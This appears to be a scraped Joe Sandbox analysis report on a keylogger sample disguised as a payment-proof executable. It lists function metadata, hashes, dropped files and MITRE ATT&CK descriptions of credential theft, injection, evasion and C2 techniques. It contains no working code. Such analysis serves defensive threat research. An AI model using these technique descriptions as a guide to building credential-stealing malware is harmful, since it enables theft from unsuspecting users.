Part of subcall function 00FF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FF7AD0

Strings

Shell_TrayWnd, xrefs: 010186DB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 18b64f56f35f61459dc6fd02d66a265645550048841fdd656dcefcc757e8e2fa
Instruction ID: b238af992950c11fd0ec0ea3712274bf235c44fb957b94e40eb86f7c70988425
Opcode Fuzzy Hash: 18b64f56f35f61459dc6fd02d66a265645550048841fdd656dcefcc757e8e2fa
Instruction Fuzzy Hash: 54D012317853187BF27476B09C0BFC67A1CAB09B11F510819B789EF1D4C9E9E950C754

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z30ProofofPaymentAttached.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut719C.tmp

C:\Users\user\AppData\Local\Temp\murky

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
z30ProofofPaymentAttached.exe

Function 00FDB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00FB3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00FCDDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 00FB406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00FFFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00FB3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00FFBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00FB3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00FB3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 00A1BEC8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00FB49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 00FB36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00A1BCA8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Function 00FB51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre